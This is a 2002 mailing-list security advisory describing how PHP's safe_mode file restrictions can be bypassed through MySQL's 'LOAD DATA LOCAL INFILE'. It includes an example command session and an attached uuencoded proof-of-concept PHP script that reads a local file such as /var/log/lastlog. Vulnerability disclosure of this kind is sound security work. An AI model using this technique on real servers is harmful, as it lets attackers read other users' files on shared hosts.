PHP Safe Mode Filesystem Circumvention Problem

From: Dave Wilson (dw@DAHOMELANDS.NET)
Date: 02/03/02 

Date:         Sun, 3 Feb 2002 22:21:44 +0000
From: Dave Wilson <dw@DAHOMELANDS.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ------------------------------------------------------------------------------

                         Security Advisory DW020203-PHP
                           Release: 3rd February 2002

                 PHP Safe Mode Filesystem Circumvention Problem

 Severity: Medium to high.
 Affects: PHP, all versions which include safe_mode feature.
 Platform: UNIX, Microsoft Windows, any platforms on which PHP is available.
 Vendor: http://php.net.
 Discovered: 12th January 2002, Dave Wilson <dw@dahomelands.net>, using
             PHP 4.1.0 & Apache 2 on Linux.

 ------------------------------------------------------------------------------

VULNERABILITY IN BRIEF

   PHP (since version 3?) includes a commonly used feature known as Safe Mode.
   When enabled, scripts are highly limited in their ability to access or
   execute local files, among other things.

   PHP relies on a wrapper function around all filesystem calls to perform
   access checks, but unforunately the bundled MySQL client library has not
   been modified to perform such checks on "LOAD DATA INFILE LOCAL" statements.

   If an attacker has access to a MySQL server (either provided by you or
   himself), he can use it as a proxy by which to download files residing on
   the safe_mode-enabled web server. For large ISPs relying on this feature
   for individual customer privacy, it could mean clients accessing each
   other's files, or viewing of files on an improperly secured server.

FIX

   Currently, no fix exists. You may use other PHP safe_mode functions to
   disable the use of the MySQL client library, or secure your servers in a
   proper fashion.. A suggested fix for the PHP developers might be to scan
   mysql_query()s for strings similar to "LOAD DATA LOCAL INFILE".

   Happy hackers out there might like to look at libmysql.c:1764 if interested
   in fixing this problem, although that may only be possible from within PHP.

EXAMPLE

   The attached script will (once configured correctly) attempt to read
   "/var/log/lastlog" via the SQL daemon and return it to the client.

   $ cp safe_mode.php /www
   $ wget -qO lastlog_via_mysql localhost/safe_mode.php
   $ diff /var/log/lastlog lastlog_via_mysql; echo $?
   0

COMMENTS

   Due to the nature of the PHP project, development is very rapid and hence
   many sites do not keep up with latest PHP versions. If a fix was available,
   it would take quite a while to propagate.

   It is likely that this is not an isolated problem in PHP, my bets are on
   PostgreSQL and other PHP database extensions missing this one too.

   The MySQL support has been enabled in PHP by default for as long as I can
   remember.

DAVE WILSON

   Currently residing in Belfast, Northern Ireland, he is available for work
   relating to network security auditing, post-attack recovery and forensics,
   and penetration testing. He may be contacted at <dw@dahomelands.net>. If
   you have any comments regarding this advisory, please contact him directly.

Sun Feb 3 21:23:03 GMT 2002 -dw

begin 644 safe_mode.php
M/#\*"B\J"B`@(%!(4"!3869E($UO9&4@4')O8FQE;0H*("`@5&AI<R!S8W)I
M<'0@=VEL;"!C;VYN96-T('1O(&$@9&%T86)A<V4@<V5R=F5R(')U;FYI;F<@
M;&]C86QL>2!O<B!O=&AE<G=I<V4L"B`@(&-R96%T92!A('1E;7!O<F%R>2!T
M86)L92!W:71H(&]N92!C;VQU;6XL('5S92!T:&4@3$]!1"!$051!('-T871E
M;65N="!T;PH@("!R96%D(&$@*'!O<W-I8FQY(&)I;F%R>2D@9FEL92P@=&AE
M;B!R96%D<R!I="!B86-K('1O('1H92!C;&EE;G0N"@H@("!!;GD@='EP92!O
M9B!F:6QE(&UA>2!P87-S('1H<F]U9V@@=&AI<R`G<')O>'DG+B!!;'1H;W5G
M:"!U;G)E;&%T960L('1H:7,*("`@;6%Y(&%L<V\@8F4@=7-E9"!T;R!A8V-E
M<W,@9FEL97,@;VX@=&AE($1"('-E<G9E<B`H86QT:&]U9V@@=&AE>2!M=7-T
M(&)E"B`@('=O<FQD+7)E861A8FQE(&]R(&EN($UY4U%,9"=S(&)A<V5D:7(L
M(&%C8V]R9&EN9R!T;R!D;V-S*2X**B\*"@HD:&]S="`]("=L;V-A;&AO<W0G
M.PHD=7-E<B`]("=R;V]T)SL*)'!A<W,@/2`G;&5T;65I;B<["B1D8B`@(#T@
M)W1E<W1?9&%T86)A<V4G.PH*)&9I;&5N86UE(#T@)R]V87(O;&]G+VQA<W1L
M;V<G.R`@("`@+RH@1FEL92!T;R!G<F%B(&9R;VT@6VQO8V%L72!S97)V97(@
M*B\*)&QO8V%L(#T@=')U93L@("`@("`@("`@("`@("`@("`@("`@+RH@4F5A
M9"!F<F]M(&QO8V%L(&9I;&5S>7-T96T@*B\*"@HD;&]C86P@/2`D;&]C86P@
M/R`G3$]#04PG(#H@)R<["@HD<W%L(#T@87)R87D@*`H@("`B55-%("1D8B(L
M"@H@("`G0U)%051%(%1%35!/4D%262!404),12`G("X@*"1T8FP@/2`G02<N
M=&EM92`H*2D@+B`G("AA($Q/3D="3$]"*2<L"@H@("`B3$]!1"!$051!("1L
M;V-A;"!)3D9)3$4@)R1F:6QE;F%M92<@24Y43R!404),12`D=&)L($9)14Q$
M4R`B"B`@("X@(E1%4DU)3D%4140@0ED@("`@("`@)U]?5$A)4U].159%4E](
M05!014Y37U\G("(*("`@+B`B15-#05!%1"!"62`@("`@("`@("`G)R`B"B`@
M("X@(DQ)3D53(%1%4DU)3D%4140@0ED@)U]?5$A)4U].159%4E](05!014Y3
M7U\G(BP*"B`@(")314Q%0U0@82!&4D]-("1T8FP@3$E-250@,2(**3L*"DAE
M861E<B`H)T-O;G1E;G0M='EP93H@=&5X="]P;&%I;B<I.PH*;7ES<6Q?8V]N
M;F5C="`H)&AO<W0L("1U<V5R+"`D<&%S<RD["@IF;W)E86-H("@D<W%L(&%S
M("1S=&%T96UE;G0I('L*("`@)'$@/2!M>7-Q;%]Q=65R>2`H)'-T871E;65N
M="D["@H@("!I9B`H)'$@/3T@9F%L<V4I(&1I92`H"B`@("`@(")&04E,140Z
M("(@+B`D<W1A=&5M96YT("X@(EQN(B`N"B`@("`@(")214%33TXZ("(@+B!M
M>7-Q;%]E<G)O<B`H*2`N(")<;B(*("`@*3L*"B`@(&EF("@A("1R(#T@0&UY
M<W%L7V9E=&-H7V%R<F%Y("@D<2P@35E344Q?3E5-*2D@8V]N=&EN=64["@H@
L("!E8VAO("1R(%LP73L*("`@;7ES<6Q?9G)E95]R97-U;'0@*"1Q*3L*?0H`
`
end
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAjxds+sACgkQs0ye6vw1XQFp4ACgktwtq2IXVxhY1gXOSfmnRpa5
MBMAnjqqAm/KKS0A4EzaRTa7fpdCAbk7
=DP/f
-----END PGP SIGNATURE-----

oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Delivery co-sponsored by Qualys - Make Your Network Secure
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Go Beyond PARTIAL Security: FREE White Paper

Stop hassling with half-baked ENTERPRISE SECURITY.
FREE White Paper shows you how to ensure TOTAL security for your Internet
perimeter with the most current and most complete PROACTIVE Vulnerability
Assessment solution. Get your FREE White Paper now. Click here!
https://www.qualys.com/forms/techwhite_86.html
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo

Relevant Pages

  • Re: Looking for general advice on security
    ... with the words "and be security conscious by using SSL" on the last page which is what most adviice I've found so far boils down to. ... I've located standard advice such as using PHP strip-tags on input fields and other PHP specific stuff but was wondering how best to get interactive with the security. ... Set safe mode on if it's not already the default mode on your server. ... Of course only applicable if you have access to your own server as root. ...
    (comp.lang.php)
  • Re: [PHP] Out source files
    ... >> server, and use URL fopen to read them, if you like. ... In several PHP security recommendation we can read "Do not let PHP ... a vulnerability of the application doesn't expose all the data to the ...
    (php.general)
  • configure PHP4 for PHP on IIS6 using SQL 2000 ?
    ... I have installed a PHP SQL application named "Shop-Scripts" on IIS6. ... allow PHP to work on IIS6 with SQL SERVER 2000 (assuming this was the ... A warning appears if the specified function is not defined, ... Setting certain environment variables may be a potential security breach. ...
    (microsoft.public.inetserver.iis)
  • Re: Executing a locally installed program in IIS 6
    ... I agree that this is a security hole and am looking into ... >vulnerability on Windows Server 2003 in order to function ... but the underlying problem is PHP ... >then the shell command will work. ...
    (microsoft.public.inetserver.misc)
  • Re: Question on password visibilty?
    ... > If it is accessable from the Internet, which it probably is if it ... security IS an issue. ... The Debian/Apache server is only on my home network and is not set up ... > PHP page, it will serve the OUTPUT of that page. ...
    (comp.lang.php)